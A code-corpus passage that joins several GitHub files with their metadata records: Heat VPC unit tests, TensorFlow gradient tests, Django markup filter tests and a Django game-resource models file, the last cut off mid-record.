self.mock_create_network_interface()
self.mock_show_network_interface()
self.mock_delete_network_interface()
self.mock_delete_subnet()
self.mock_delete_network()
self.mock_delete_security_group()
self.m.ReplayAll()
stack = self.create_stack(self.test_template)
try:
self.assertEqual((stack.CREATE, stack.COMPLETE), stack.state)
rsrc = stack['the_nic']
self.assertResourceState(rsrc, 'dddd')
self.assertEqual('10.0.0.100', rsrc.FnGetAtt('PrivateIpAddress'))
finally:
scheduler.TaskRunner(stack.delete)()
self.m.VerifyAll()
def test_network_interface_existing_groupset(self):
self.m.StubOutWithMock(parser.Stack, 'resource_by_refid')
self.mock_create_security_group()
self.mock_create_network()
self.mock_create_subnet()
self.mock_show_subnet()
self.mock_create_network_interface()
self.mock_delete_network_interface()
self.mock_delete_subnet()
self.mock_delete_network()
self.mock_delete_security_group()
self.m.ReplayAll()
stack = self.create_stack(self.test_template)
try:
self.assertEqual((stack.CREATE, stack.COMPLETE), stack.state)
rsrc = stack['the_nic']
self.assertResourceState(rsrc, 'dddd')
finally:
stack.delete()
self.m.VerifyAll()
def test_network_interface_no_groupset(self):
self.mock_create_network()
self.mock_create_subnet()
self.mock_show_subnet()
self.mock_create_network_interface(security_groups=None)
self.mock_delete_network_interface()
self.mock_delete_subnet()
self.mock_delete_network()
self.m.ReplayAll()
stack = self.create_stack(self.test_template_no_groupset)
stack.delete()
self.m.VerifyAll()
def test_network_interface_error(self):
self.assertRaises(
exception.StackValidationFailed,
self.create_stack,
self.test_template_error)
class InternetGatewayTest(VPCTestBase):
test_template = '''
HeatTemplateFormatVersion: '2012-12-12'
Resources:
the_gateway:
Type: AWS::EC2::InternetGateway
the_vpc:
Type: AWS::EC2::VPC
Properties:
CidrBlock: '10.0.0.0/16'
the_subnet:
Type: AWS::EC2::Subnet
Properties:
CidrBlock: 10.0.0.0/24
VpcId: {Ref: the_vpc}
AvailabilityZone: moon
the_attachment:
Type: AWS::EC2::VPCGatewayAttachment
Properties:
VpcId: {Ref: the_vpc}
InternetGatewayId: {Ref: the_gateway}
the_route_table:
Type: AWS::EC2::RouteTable
Properties:
VpcId: {Ref: the_vpc}
the_association:
Type: AWS::EC2::SubnetRouteTableAssociation
Properties:
RouteTableId: {Ref: the_route_table}
SubnetId: {Ref: the_subnet}
'''
def mock_create_internet_gateway(self):
neutronclient.Client.list_networks(
**{'router:external': True}).AndReturn({'networks': [{
'status': 'ACTIVE',
'subnets': [],
'name': 'nova',
'router:external': True,
'tenant_id': 'c1210485b2424d48804aad5d39c61b8f',
'admin_state_up': True,
'shared': True,
'id': '0389f747-7785-4757-b7bb-2ab07e4b09c3'
}]})
def mock_create_gateway_attachment(self):
neutronclient.Client.add_gateway_router(
'ffff', {'network_id': '0389f747-7785-4757-b7bb-2ab07e4b09c3'}
).AndReturn(None)
def mock_delete_gateway_attachment(self):
neutronclient.Client.remove_gateway_router('ffff').AndReturn(None)
def test_internet_gateway(self):
self.mock_create_internet_gateway()
self.mock_create_network()
self.mock_create_subnet()
self.mock_create_route_table()
self.mock_create_association()
self.mock_create_gateway_attachment()
self.mock_delete_gateway_attachment()
self.mock_delete_association()
self.mock_delete_route_table()
self.mock_delete_subnet()
self.mock_delete_network()
self.m.ReplayAll()
stack = self.create_stack(self.test_template)
gateway = stack['the_gateway']
self.assertResourceState(gateway, gateway.physical_resource_name())
attachment = stack['the_attachment']
self.assertResourceState(attachment, 'the_attachment')
route_table = stack['the_route_table']
self.assertEqual(list(attachment._vpc_route_tables()), [route_table])
stack.delete()
self.m.VerifyAll()
class RouteTableTest(VPCTestBase):
test_template = '''
HeatTemplateFormatVersion: '2012-12-12'
Resources:
the_vpc:
Type: AWS::EC2::VPC
Properties:
CidrBlock: '10.0.0.0/16'
the_subnet:
Type: AWS::EC2::Subnet
Properties:
CidrBlock: 10.0.0.0/24
VpcId: {Ref: the_vpc}
AvailabilityZone: moon
the_route_table:
Type: AWS::EC2::RouteTable
Properties:
VpcId: {Ref: the_vpc}
the_association:
Type: AWS::EC2::SubnetRouteTableAssociation
Properties:
RouteTableId: {Ref: the_route_table}
SubnetId: {Ref: the_subnet}
'''
def test_route_table(self):
self.mock_create_network()
self.mock_create_subnet()
self.mock_create_route_table()
self.mock_create_association()
self.mock_delete_association()
self.mock_delete_route_table()
self.mock_delete_subnet()
self.mock_delete_network()
self.m.ReplayAll()
stack = self.create_stack(self.test_template)
route_table = stack['the_route_table']
self.assertResourceState(route_table, 'ffff')
association = stack['the_association']
self.assertResourceState(association, 'the_association')
scheduler.TaskRunner(association.delete)()
scheduler.TaskRunner(route_table.delete)()
stack.delete()
self.m.VerifyAll()
|
{
"content_hash": "7da5abbaeee577083a8e0638b140ad5e",
"timestamp": "",
"source": "github",
"line_count": 836,
"max_line_length": 79,
"avg_line_length": 34.188995215311,
"alnum_prop": 0.5567140158141488,
"repo_name": "redhat-openstack/heat",
"id": "a65c292179dfca1a9972a2d3d14f854370a8d6cb",
"size": "29157",
"binary": false,
"copies": "1",
"ref": "refs/heads/f22-patches",
"path": "heat/tests/test_vpc.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "4827027"
},
{
"name": "Shell",
"bytes": "26720"
}
],
"symlink_target": ""
}
|
"""Tests for tensorflow.ops.gradients."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import warnings
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_ops
from tensorflow.python.framework import test_util
from tensorflow.python.framework.constant_op import constant
from tensorflow.python.ops import array_grad # pylint: disable=unused-import
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_grad # pylint: disable=unused-import
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_grad # pylint: disable=unused-import
from tensorflow.python.ops import data_flow_ops # pylint: disable=unused-import
from tensorflow.python.ops import functional_ops # pylint: disable=unused-import
from tensorflow.python.ops import gradients
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import math_grad # pylint: disable=unused-import
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_grad # pylint: disable=unused-import
from tensorflow.python.ops import state_grad # pylint: disable=unused-import
from tensorflow.python.ops import tensor_array_grad # pylint: disable=unused-import
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.ops import variables
from tensorflow.python.ops.nn_ops import bias_add
from tensorflow.python.platform import googletest
def _OpsBetween(graph, to_ops, from_ops):
"""Build the list of operations between two lists of Operations.
Args:
graph: a Graph.
to_ops: list of Operations.
from_ops: list of Operations.
Returns:
The list of operations between "from_ops" and "to_ops", sorted by
decreasing operation id. This list contains all elements of to_ops.
TODO(touts): Think about returning an empty list if from_ops are not
reachable from to_ops. Presently it returns to_ops in that case.
"""
# List of booleans, indexed by operation id, indicating if
# an op is reached from the output of "input_ops".
reached_ops = [False] * (graph._last_id + 1)
# We only care to reach up to "output_ops" so we mark the
# output ops as reached to avoid recursing past them.
for op in to_ops:
reached_ops[op._id] = True
gradients_impl._MarkReachedOps(from_ops, reached_ops)
between_ops = gradients_impl._GatherInputs(to_ops, reached_ops)
between_ops.sort(key=lambda x: -x._id)
return between_ops
class GradientsTest(test_util.TensorFlowTestCase):
def _OpNames(self, op_list):
return ["%s/%d" % (str(op.name), op._id) for op in op_list]
def _assertOpListEqual(self, ops1, ops2):
self.assertEquals(self._OpNames(ops1), self._OpNames(ops2))
def testOpsBetweenSimple(self):
with ops.Graph().as_default() as g:
t1 = constant(1.0)
t2 = constant(2.0)
t3 = array_ops.stack([t1, t2])
# Full graph
self._assertOpListEqual([t3.op, t2.op, t1.op],
_OpsBetween(g, [t3.op], [t1.op, t2.op]))
# Only t1, t3.
self._assertOpListEqual([t3.op, t1.op], _OpsBetween(g, [t3.op], [t1.op]))
def testOpsBetweenUnreachable(self):
with ops.Graph().as_default() as g:
t1 = constant(1.0)
t2 = constant(2.0)
_ = array_ops.stack([t1, t2])
t4 = constant(1.0)
t5 = constant(2.0)
t6 = array_ops.stack([t4, t5])
# Elements of to_ops are always listed.
self._assertOpListEqual([t6.op], _OpsBetween(g, [t6.op], [t1.op]))
def testOpsBetweenCut(self):
with ops.Graph().as_default() as g:
t1 = constant(1.0)
t2 = constant(2.0)
t3 = array_ops.stack([t1, t2])
t4 = constant([1.0])
t5 = array_ops.concat([t4, t3], 0)
t6 = constant([2.0])
t7 = array_ops.concat([t5, t6], 0)
self._assertOpListEqual([t7.op, t5.op, t4.op],
_OpsBetween(g, [t7.op], [t4.op]))
def testOpsBetweenCycle(self):
with ops.Graph().as_default() as g:
t1 = constant(1.0)
t2 = constant(2.0)
t3 = array_ops.stack([t1, t2])
t4 = array_ops.concat([t3, t3, t3], 0)
t5 = constant([1.0])
t6 = array_ops.concat([t4, t5], 0)
t7 = array_ops.concat([t6, t3], 0)
self._assertOpListEqual([t6.op, t4.op, t3.op],
_OpsBetween(g, [t6.op], [t3.op]))
self._assertOpListEqual([t7.op, t6.op, t5.op, t4.op, t3.op, t1.op],
_OpsBetween(g, [t7.op], [t1.op, t5.op]))
self._assertOpListEqual([t6.op, t5.op, t4.op, t3.op, t2.op],
_OpsBetween(g, [t6.op], [t2.op, t5.op]))
def testGradients(self):
with ops.Graph().as_default():
inp = constant(1.0, shape=[32, 100], name="in")
w = constant(1.0, shape=[100, 10], name="w")
b = constant(1.0, shape=[10], name="b")
xw = math_ops.matmul(inp, w, name="xw")
h = bias_add(xw, b, name="h")
w_grad = gradients.gradients(h, w)[0]
self.assertEquals("MatMul", w_grad.op.type)
self.assertEquals(w_grad.op._original_op, xw.op)
self.assertTrue(w_grad.op.get_attr("transpose_a"))
self.assertFalse(w_grad.op.get_attr("transpose_b"))
def testUnusedOutput(self):
with ops.Graph().as_default():
w = constant(1.0, shape=[2, 2])
x = constant(1.0, shape=[2, 2])
wx = math_ops.matmul(w, x)
split_wx = array_ops.split(value=wx, num_or_size_splits=2, axis=0)
c = math_ops.reduce_sum(split_wx[1])
gw = gradients.gradients(c, [w])[0]
self.assertEquals("MatMul", gw.op.type)
def testColocateGradients(self):
with ops.Graph().as_default() as g:
w = constant(1.0, shape=[1, 1])
x = constant(1.0, shape=[1, 2])
with g.device("/gpu:0"):
wx = math_ops.matmul(w, x)
gw = gradients.gradients(wx, [w], colocate_gradients_with_ops=True)[0]
self.assertEqual(gw.op.colocation_groups(), wx.op.colocation_groups())
def testColocateGradientsWithAggregation(self):
with ops.Graph().as_default() as g:
with g.device("/gpu:1"):
w = constant(1.0, shape=[1, 1])
x = constant(1.0, shape=[1, 2])
y = constant(1.0, shape=[1, 2])
wx = math_ops.matmul(w, x)
wy = math_ops.matmul(w, y)
with g.device("/gpu:0"):
z = wx + wy
gw1 = gradients.gradients(z, [w], colocate_gradients_with_ops=True)[0]
self.assertEqual(gw1.op.colocation_groups(), wx.op.colocation_groups())
gw2 = gradients.gradients(z, [w], colocate_gradients_with_ops=False)[0]
self.assertTrue(wx.op.colocation_groups() != gw2.op.colocation_groups())
def testColocateGradientsWithAggregationInMultipleDevices(self):
with ops.Graph().as_default() as g:
with g.device("/gpu:1"):
w = constant(1.0, shape=[1, 1])
x = constant(1.0, shape=[1, 2])
y = constant(1.0, shape=[1, 2])
with g.device("/task:1"):
wx = math_ops.matmul(w, x)
with g.device("/task:2"):
wy = math_ops.matmul(w, y)
with g.device("/gpu:0"):
z = wx + wy
gw1 = gradients.gradients(z, [w], colocate_gradients_with_ops=True)[0]
self.assertEqual(gw1.op.colocation_groups(), w.op.colocation_groups())
gw2 = gradients.gradients(z, [w], colocate_gradients_with_ops=False)[0]
self.assertTrue(w.op.colocation_groups() != gw2.op.colocation_groups())
def testBoundaryStop(self):
# Test that we don't differentiate 'x'. The gradient function for 'x' is
# set explicitly to None so we will get an exception if the gradient code
# tries to differentiate 'x'.
with ops.Graph().as_default():
c = constant(1.0)
x = array_ops.identity(c)
y = x + 1.0
z = y + 1
grads = gradients.gradients(z, [x])
self.assertTrue(all(x is not None for x in grads))
def testBoundaryContinue(self):
# Test that we differentiate both 'x' and 'y' correctly when x is a
# predecessor of y.
with self.test_session():
x = constant(1.0)
y = x * 2.0
z = y * 3.0
grads = gradients.gradients(z, [x, y])
self.assertTrue(all(x is not None for x in grads))
self.assertEqual(6.0, grads[0].eval())
def testAggregationMethodAccumulateN(self):
with self.test_session():
x = constant(1.0)
y = x * 2.0
z = y + y + y + y + y + y + y + y + y + y
grads = gradients.gradients(
z, [x, y],
aggregation_method=gradients.AggregationMethod.
EXPERIMENTAL_ACCUMULATE_N)
self.assertTrue(all(x is not None for x in grads))
self.assertEqual(20.0, grads[0].eval())
self.assertEqual(10.0, grads[1].eval())
def testAggregationMethodAddN(self):
with self.test_session():
x = constant(1.0)
y = x * 2.0
z = y + y + y + y + y + y + y + y + y + y
grads = gradients.gradients(
z, [x, y], aggregation_method=gradients.AggregationMethod.ADD_N)
self.assertTrue(all(x is not None for x in grads))
self.assertEqual(20.0, grads[0].eval())
self.assertEqual(10.0, grads[1].eval())
def testAggregationMethodTree(self):
with self.test_session():
x = constant(1.0)
y = x * 2.0
z = y + y + y + y + y + y + y + y + y + y
grads = gradients.gradients(
z, [x, y],
aggregation_method=gradients.AggregationMethod.EXPERIMENTAL_TREE)
self.assertTrue(all(x is not None for x in grads))
self.assertEqual(20.0, grads[0].eval())
self.assertEqual(10.0, grads[1].eval())
def testNoGradientForStringOutputs(self):
with ops.Graph().as_default():
def _TestOpGrad(_, float_grad, string_grad):
"""Gradient function for TestStringOutput."""
self.assertEquals(float_grad.dtype, dtypes.float32)
self.assertFalse(string_grad)
return float_grad
ops.RegisterGradient("TestStringOutput")(_TestOpGrad)
c = constant(1.0)
x, _ = test_ops.test_string_output(c)
z = x * 2.0
w = z * 3.0
grads = gradients.gradients(z, [c])
self.assertTrue(isinstance(grads[0], ops.Tensor))
grads = gradients.gradients(w, [c])
self.assertTrue(isinstance(grads[0], ops.Tensor))
def testSingletonIndexedSlices(self):
with ops.Graph().as_default():
x = array_ops.placeholder(dtypes.float32)
y = array_ops.identity(x)
dy = ops.IndexedSlices(
array_ops.placeholder(dtypes.float32),
array_ops.placeholder(dtypes.int32))
dx, = gradients.gradients(y, x, grad_ys=dy)
# The gradient of tf.identity should pass the value through unchanged.
# A previous version of the code did this only for tf.Tensor, not
# tf.IndexedSlices.
self.assertEqual(dx, dy)
def testNonDifferentiableSwitchInWhileLoop(self):
with ops.Graph().as_default():
v = array_ops.placeholder(dtypes.float32, [])
def _Step(i, a, ta):
a += math_ops.cast(v, dtypes.int32)
return (i + 1, a, ta.write(i, a))
n = 4
i, _, ta = control_flow_ops.while_loop(
lambda i, *_: i < n,
_Step, [0, 0, tensor_array_ops.TensorArray(
dtypes.int32, size=n)])
target = ta.read(i - 1)
grad, = gradients.gradients(target, v)
self.assertIsNone(grad)
def testVariableReadValueGradient(self):
with ops.Graph().as_default():
init = constant_op.constant(100.0)
var = variables.Variable(init)
gradient = gradients.gradients(var.read_value(), var)
self.assertIsNotNone(gradient)
def testVariableAsGraphElementGradient(self):
with ops.Graph().as_default() as graph:
init = constant_op.constant(100.0)
var = variables.Variable(init)
gradient = gradients.gradients(graph.as_graph_element(var), var)
self.assertIsNotNone(gradient)
def testVariableRefGradient(self):
with ops.Graph().as_default():
init = constant_op.constant(100.0)
var = variables.Variable(init)
gradient = gradients.gradients(var._ref(), var)
self.assertIsNotNone(gradient)
def testDependentYs(self):
with self.test_session():
x = constant_op.constant(3.0)
y = math_ops.square(x)
y1 = math_ops.square(y)
y2 = math_ops.square(y1)
g = gradients.gradients([y, y2], x)
self.assertAllClose(17502.0, g[0].eval())
g = gradients.gradients(y + y2, x)
self.assertAllClose(17502.0, g[0].eval())
z = array_ops.identity(y)
z2 = array_ops.identity(y2)
g = gradients.gradients([z, z2], x)
self.assertAllClose(17502.0, g[0].eval())
class FunctionGradientsTest(test_util.TensorFlowTestCase):
@classmethod
def XSquarePlusB(cls, x, b):
return x * x + b
@classmethod
def XSquarePlusBGradient(cls, x, b, g):
# Perturb gradients (multiply by 2), so we can test that this was called.
g *= 2.0
return g * 2.0 * x, g
@classmethod
def _PythonGradient(cls, op, grad):
# Perturb gradients (multiply by 3), so we can test that this was called.
grad *= 3.0
return grad * op.inputs[0] * 2.0, grad
@classmethod
def _GetFunc(cls, **kwargs):
return function.Defun(dtypes.float32, dtypes.float32, **
kwargs)(cls.XSquarePlusB)
def _GetFuncGradients(self, f, x_value, b_value):
x = constant_op.constant(x_value, name="x")
b = constant_op.constant(b_value, name="b")
y = f(x, b)
grads = gradients.gradients(y, [x, b])
with self.test_session() as sess:
return sess.run(grads)
def testFunctionGradientsBasic(self):
g = ops.Graph()
with g.as_default():
f = self._GetFunc()
# Get gradients (should add SymbolicGradient node for function).
grads = self._GetFuncGradients(f, [2.0], [1.0])
self.assertAllEqual([4.0], grads[0])
self.assertAllEqual([1.0], grads[1])
def testFunctionGradientsComposition(self):
with ops.Graph().as_default():
f = self._GetFunc()
x = constant_op.constant([2.0], name="x")
b1 = constant_op.constant([1.0], name="b1")
b2 = constant_op.constant([1.0], name="b2")
y = f(f(x, b1), b2)
# Build gradient graph (should add SymbolicGradient node for function).
grads = gradients.gradients(y, [x, b1])
with self.test_session() as sess:
self.assertAllEqual([40.0], sess.run(grads)[0])
self.assertAllEqual([10.0], sess.run(grads)[1])
def testFunctionGradientsWithGradFunc(self):
g = ops.Graph()
with g.as_default():
grad_func = function.Defun(dtypes.float32, dtypes.float32,
dtypes.float32)(self.XSquarePlusBGradient)
f = self._GetFunc(grad_func=grad_func)
# Get gradients (should add SymbolicGradient node for function, which
# uses the grad_func above, which multiplies all gradients by 2).
grads = self._GetFuncGradients(f, [2.0], [1.0])
self.assertAllEqual([4.0 * 2], grads[0])
self.assertAllEqual([1.0 * 2], grads[1])
def testFunctionGradientWithRegistration(self):
g = ops.Graph()
with g.as_default():
f = self._GetFunc(python_grad_func=self._PythonGradient)
# Get gradients, using the python gradient function. It multiplies the
# gradients by 3.
grads = self._GetFuncGradients(f, [2.0], [1.0])
self.assertAllEqual([4.0 * 3], grads[0])
self.assertAllEqual([1.0 * 3], grads[1])
def testFunctionGradientWithGradFuncAndRegistration(self):
g = ops.Graph()
with g.as_default():
grad_func = function.Defun(dtypes.float32, dtypes.float32,
dtypes.float32)(self.XSquarePlusBGradient)
with self.assertRaisesRegexp(ValueError, "Gradient defined twice"):
f = self._GetFunc(
grad_func=grad_func, python_grad_func=self._PythonGradient)
f.add_to_graph(ops.Graph())
class StopGradientTest(test_util.TensorFlowTestCase):
def testStopGradient(self):
with ops.Graph().as_default():
inp = constant(1.0, shape=[100, 32], name="in")
out = array_ops.stop_gradient(inp)
igrad = gradients.gradients(out, inp)[0]
assert igrad is None
class PreventGradientTest(test_util.TensorFlowTestCase):
def testPreventGradient(self):
with ops.Graph().as_default():
inp = constant(1.0, shape=[100, 32], name="in")
out = array_ops.prevent_gradient(inp)
with self.assertRaisesRegexp(LookupError, "explicitly disabled"):
_ = gradients.gradients(out, inp)
class HessianVectorProductTest(test_util.TensorFlowTestCase):
def testHessianVectorProduct(self):
# Manually compute the Hessian explicitly for a low-dimensional problem
# and check that HessianVectorProduct matches multiplication by the
# explicit Hessian.
# Specifically, the Hessian of f(x) = x^T A x is
# H = A + A^T.
# We expect HessianVectorProduct(f(x), x, v) to be H v.
m = 4
rng = np.random.RandomState([1, 2, 3])
mat_value = rng.randn(m, m).astype("float32")
v_value = rng.randn(m, 1).astype("float32")
x_value = rng.randn(m, 1).astype("float32")
hess_value = mat_value + mat_value.T
hess_v_value = np.dot(hess_value, v_value)
for use_gpu in [False, True]:
with self.test_session(use_gpu=use_gpu):
mat = constant_op.constant(mat_value)
v = constant_op.constant(v_value)
x = constant_op.constant(x_value)
mat_x = math_ops.matmul(mat, x, name="Ax")
x_mat_x = math_ops.matmul(array_ops.transpose(x), mat_x, name="xAx")
hess_v = gradients_impl._hessian_vector_product(x_mat_x, [x], [v])[0]
hess_v_actual = hess_v.eval()
self.assertAllClose(hess_v_value, hess_v_actual)
class HessianTest(test_util.TensorFlowTestCase):
def testHessian1D(self):
# Manually compute the Hessian explicitly for a low-dimensional problem
# and check that `hessian` matches. Specifically, the Hessian of
# f(x) = x^T A x is H = A + A^T.
m = 4
rng = np.random.RandomState([1, 2, 3])
mat_value = rng.randn(m, m).astype("float32")
x_value = rng.randn(m).astype("float32")
hess_value = mat_value + mat_value.T
with self.test_session(use_gpu=True):
mat = constant_op.constant(mat_value)
x = constant_op.constant(x_value)
x_mat_x = math_ops.reduce_sum(x[:, None] * mat * x[None, :])
hess = gradients.hessians(x_mat_x, x)[0]
hess_actual = hess.eval()
self.assertAllClose(hess_value, hess_actual)
def testHessian1D_multi(self):
# Test the computation of the hessian with respect to multiple tensors
m = 4
n = 3
rng = np.random.RandomState([1, 2, 3])
mat_values = [rng.randn(m, m).astype("float32") for _ in range(n)]
x_values = [rng.randn(m).astype("float32") for _ in range(n)]
hess_values = [mat_value + mat_value.T for mat_value in mat_values]
with self.test_session(use_gpu=True):
mats = [constant_op.constant(mat_value) for mat_value in mat_values]
xs = [constant_op.constant(x_value) for x_value in x_values]
xs_mats_xs = [
math_ops.reduce_sum(x[:, None] * mat * x[None, :])
for x, mat in zip(xs, mats)
]
hessians = gradients.hessians(xs_mats_xs, xs)
hessians_actual = [hess.eval() for hess in hessians]
for hess_value, hess_actual in zip(hess_values, hessians_actual):
self.assertAllClose(hess_value, hess_actual)
def testHessianInvalidDimension(self):
for shape in [(10, 10), None]:
with self.test_session(use_gpu=True):
x = array_ops.placeholder(dtypes.float32, shape)
# Expect a ValueError because the dimensions are wrong
with self.assertRaises(ValueError):
gradients.hessians(x, x)
class IndexedSlicesToTensorTest(test_util.TensorFlowTestCase):
def testIndexedSlicesToTensor(self):
with self.test_session():
np_val = np.random.rand(4, 4, 4, 4).astype(np.float32)
c = constant_op.constant(np_val)
c_sparse = math_ops._as_indexed_slices(c)
self.assertAllEqual(np_val.shape, c_sparse.dense_shape.eval())
c_dense = math_ops.multiply(c_sparse, 1.0)
self.assertAllClose(np_val, c_dense.eval())
def testIndexedSlicesToTensorList(self):
with self.test_session():
numpy_list = []
dense_list = []
sparse_list = []
for _ in range(3):
np_val = np.random.rand(4, 4, 4, 4).astype(np.float32)
c = constant_op.constant(np_val)
c_sparse = math_ops._as_indexed_slices(c)
numpy_list.append(np_val)
dense_list.append(c)
sparse_list.append(c_sparse)
packed_dense = array_ops.stack(dense_list)
packed_sparse = array_ops.stack(sparse_list)
self.assertAllClose(packed_dense.eval(), packed_sparse.eval())
def testInt64Indices(self):
with self.test_session():
np_val = np.random.rand(4, 4, 4, 4).astype(np.float32)
c = constant_op.constant(np_val)
c_sparse = math_ops._as_indexed_slices(c)
c_sparse = ops.IndexedSlices(
c_sparse.values,
math_ops.cast(c_sparse.indices, dtypes.int64), c_sparse.dense_shape)
self.assertAllEqual(np_val.shape, c_sparse.dense_shape.eval())
c_dense = math_ops.multiply(c_sparse, 1.0)
self.assertAllClose(np_val, c_dense.eval())
def testWarnings(self):
# TODO(gunan) Reenable after this issue is fixed:
# https://github.com/google/protobuf/issues/2812
if sys.version_info < (3, 6):
# Smaller than the threshold: no warning.
c_sparse = ops.IndexedSlices(
array_ops.placeholder(dtypes.float32),
array_ops.placeholder(dtypes.int32), constant([4, 4, 4, 4]))
with warnings.catch_warnings(record=True) as w:
math_ops.multiply(c_sparse, 1.0)
self.assertEqual(0, len(w))
# Greater than or equal to the threshold: warning.
c_sparse = ops.IndexedSlices(
array_ops.placeholder(dtypes.float32),
array_ops.placeholder(dtypes.int32), constant([100, 100, 100, 100]))
with warnings.catch_warnings(record=True) as w:
math_ops.multiply(c_sparse, 1.0)
self.assertEqual(1, len(w))
self.assertTrue(
"with 100000000 elements. This may consume a large amount of memory." in
str(w[0].message))
# Unknown dense shape: warning.
c_sparse = ops.IndexedSlices(
array_ops.placeholder(dtypes.float32),
array_ops.placeholder(dtypes.int32),
array_ops.placeholder(dtypes.int32))
with warnings.catch_warnings(record=True) as w:
math_ops.multiply(c_sparse, 1.0)
self.assertEqual(1, len(w))
self.assertTrue(
"of unknown shape. This may consume a large amount of memory." in
str(w[0].message))
class OnlyRealGradientsTest(test_util.TensorFlowTestCase):
def testRealOnly(self):
x = constant_op.constant(7+3j, dtype=dtypes.complex64)
y = math_ops.square(x)
with self.assertRaisesRegexp(
TypeError,
r"Gradients of complex tensors must set grad_ys "
r"\(y\.dtype = tf\.complex64\)"):
gradients.gradients(y, x)
if __name__ == "__main__":
googletest.main()
|
{
"content_hash": "fe344b78a5bf7dc2b06731f0bf692565",
"timestamp": "",
"source": "github",
"line_count": 612,
"max_line_length": 84,
"avg_line_length": 37.995098039215684,
"alnum_prop": 0.6391003311400679,
"repo_name": "ibmsoe/tensorflow",
"id": "cd4c37d7e03a50d240d64690fa78a4f607d0f5ee",
"size": "23942",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "tensorflow/python/ops/gradients_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "7481"
},
{
"name": "C",
"bytes": "177439"
},
{
"name": "C++",
"bytes": "22867512"
},
{
"name": "CMake",
"bytes": "154015"
},
{
"name": "CSS",
"bytes": "774"
},
{
"name": "Go",
"bytes": "794578"
},
{
"name": "HTML",
"bytes": "595822"
},
{
"name": "Java",
"bytes": "286562"
},
{
"name": "JavaScript",
"bytes": "13906"
},
{
"name": "Jupyter Notebook",
"bytes": "1833654"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "37302"
},
{
"name": "Objective-C",
"bytes": "7037"
},
{
"name": "Objective-C++",
"bytes": "64166"
},
{
"name": "Protocol Buffer",
"bytes": "210699"
},
{
"name": "Python",
"bytes": "20094682"
},
{
"name": "Shell",
"bytes": "332127"
},
{
"name": "TypeScript",
"bytes": "790493"
}
],
"symlink_target": ""
}
|
import re
import unittest
from django.template import Template, Context, add_to_builtins
from django.utils.html import escape
add_to_builtins('django.contrib.markup.templatetags.markup')
class Templates(unittest.TestCase):
def test_textile(self):
try:
import textile
except ImportError:
textile = None
textile_content = """Paragraph 1
Paragraph 2 with "quotes" and @code@"""
t = Template("{{ textile_content|textile }}")
rendered = t.render(Context(locals())).strip()
if textile:
self.assertEqual(rendered, """<p>Paragraph 1</p>
<p>Paragraph 2 with “quotes” and <code>code</code></p>""")
else:
self.assertEqual(rendered, escape(textile_content))
def test_markdown(self):
try:
import markdown
except ImportError:
markdown = None
markdown_content = """Paragraph 1
## An h2"""
t = Template("{{ markdown_content|markdown }}")
rendered = t.render(Context(locals())).strip()
if markdown:
pattern = re.compile("""<p>Paragraph 1\s*</p>\s*<h2>\s*An h2</h2>""")
self.assert_(pattern.match(rendered))
else:
self.assertEqual(rendered, markdown_content)
def test_docutils(self):
try:
import docutils
except ImportError:
docutils = None
rest_content = """Paragraph 1
Paragraph 2 with a link_
.. _link: http://www.example.com/"""
t = Template("{{ rest_content|restructuredtext }}")
rendered = t.render(Context(locals())).strip()
if docutils:
# Different versions of docutils return slightly different HTML
try:
# Docutils v0.4 and earlier
self.assertEqual(rendered, """<p>Paragraph 1</p>
<p>Paragraph 2 with a <a class="reference" href="http://www.example.com/">link</a></p>""")
except AssertionError, e:
# Docutils from SVN (which will become 0.5)
self.assertEqual(rendered, """<p>Paragraph 1</p>
<p>Paragraph 2 with a <a class="reference external" href="http://www.example.com/">link</a></p>""")
else:
self.assertEqual(rendered, rest_content)
if __name__ == '__main__':
unittest.main()
|
{
"content_hash": "b91904d2617abee629f2beccfa43fde3",
"timestamp": "",
"source": "github",
"line_count": 77,
"max_line_length": 99,
"avg_line_length": 31.285714285714285,
"alnum_prop": 0.5674553756745537,
"repo_name": "greggian/TapdIn",
"id": "8bc17005f5d751555d0efc97505fab4b8dadf5e7",
"size": "2476",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "django/contrib/markup/tests.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "82525"
},
{
"name": "Python",
"bytes": "3585862"
},
{
"name": "Shell",
"bytes": "227"
}
],
"symlink_target": ""
}
|
from django.db import models
class Blueprint(models.Model):
name = models.CharField(max_length=30)
class MineBlueprint(models.Model):
name = models.CharField(max_length=30, unique=True)
max_output_rate = models.FloatField()
output = models.IntegerField()
max_capacity = models.FloatField()
def __str__(self):
return self.name
class FactoryBlueprint(models.Model):
name = models.CharField(max_length=30, unique=True)
max_output_rate = models.FloatField()
output = models.IntegerField()
max_capacity = models.FloatField()
def __str__(self):
return self.name
class ResourceType(models.Model):
name = models.CharField(max_length=30, unique=True)
requirements = models.ForeignKey('Resources', blank=True, null=True)
def __str__(self):
return self.name
class Mine(models.Model):
name = models.CharField(max_length=30, unique=True)
all_resources = models.ForeignKey('Resources')
coordinates = models.ForeignKey('Coordinates')
blueprint = models.IntegerField()
production_level = models.FloatField()
def __str__(self):
return self.name
class Coordinates(models.Model):
x = models.FloatField()
y = models.FloatField()
class Resource(models.Model):
amount = models.FloatField()
resource_type = models.ForeignKey('ResourceType')
class Resources(models.Model):
all_resources = models.ManyToManyField('Resource')
|
{
"content_hash": "2c4c046f44efe4a390bfb3b0f228da3d",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 72,
"avg_line_length": 28.88,
"alnum_prop": 0.6952908587257618,
"repo_name": "Fakor/congov",
"id": "c3172e99d994bc9a1f5a3627f498d712147cad3b",
"size": "1444",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "web/engine_integration/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
